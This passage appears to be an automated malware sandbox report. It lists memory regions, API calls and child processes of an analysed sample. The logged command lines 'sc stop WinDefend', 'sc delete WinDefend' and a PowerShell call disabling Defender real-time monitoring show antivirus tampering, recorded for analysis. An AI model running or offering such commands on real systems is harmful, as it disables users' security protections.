| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x890
57
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:43 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 172958 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a090000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7624a84f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32, type = file_attributes |
|
1 | |
| Environment | Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x76253b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76234a5d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0x5a8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #11: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:02, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x350 |
| Parent PID | 0x8a4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6E4
0x
880
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| sc.exe.mui | 0x000f0000 | 0x000fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00250000 | 0x0030ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| sc.exe | 0x00940000 | 0x0094bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x6e4
8
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:44 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 173192 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\sc.exe, base_address = 0x940000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 51 |
|
1 |
Process #12: sc.exe
8
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:02, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x410 |
| Parent PID | 0x8b0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
418
0x
878
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| sc.exe.mui | 0x00130000 | 0x0013ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x00490000 | 0x0054ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| sc.exe | 0x00940000 | 0x0094bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0x418
8
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:27:44 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 173161 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\sc.exe, base_address = 0x940000 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Service | Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 51 |
|
1 |
Process #13: powershell.exe
789
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:00, Reason: Child Process |
| Unmonitor | End Time: 00:02:42, Reason: Self Terminated |
| Monitor Duration | 00:00:42 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5a8 |
| Parent PID | 0x894 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
358
0x
798
0x
67C
0x
84C
0x
848
0x
8D4
0x
828
0x
534
0x
BB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00130000 | 0x00132fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00140fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x001b0000 | 0x001b3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x001c0000 | 0x001dffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x00230000 | 0x00233fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00280000 | 0x002affff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | - |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x0046efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x006f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00880fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c90000 | 0x01c90000 | 0x01c9ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001ca0000 | 0x01ca0000 | 0x01caffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01cbffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01ccffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x01d20000 | 0x01d22fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001d30000 | 0x01d30000 | 0x01d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01d70fff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x01d80000 | 0x01d84fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01d90000 | 0x01d97fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01eeffff | Private Memory | rwx |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01ef0000 | 0x01f55fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001f60000 | 0x01f60000 | 0x01f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x01fdffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x01fe0000 | 0x02020fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0209ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x020a0000 | 0x0236efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002370000 | 0x02370000 | 0x02762fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000027a0000 | 0x027a0000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002820000 | 0x02820000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x02860000 | 0x028a2fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000028b0000 | 0x028b0000 | 0x028bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0291ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x029effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029f0000 | 0x029f0000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002af0000 | 0x02af0000 | 0x02b2ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002b30000 | 0x02b30000 | 0x04b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b6ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x04b70000 | 0x04e51fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x04e60000 | 0x04f1ffff | Memory Mapped File | rw |
|
|
|
- |
| powershell.exe | 0x21fb0000 | 0x22021fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x71c70000 | 0x71d0bfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x71d10000 | 0x71d94fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x71da0000 | 0x71fd4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x71fe0000 | 0x72859fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x72860000 | 0x72b41fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x72b50000 | 0x732ebfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x732f0000 | 0x73de7fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x74670000 | 0x7470afff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x74710000 | 0x74cbafff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74cc0000 | 0x74d37fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x74d40000 | 0x74d49fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x74d50000 | 0x74d5afff | Memory Mapped File | rwx |
|
|
|
- |
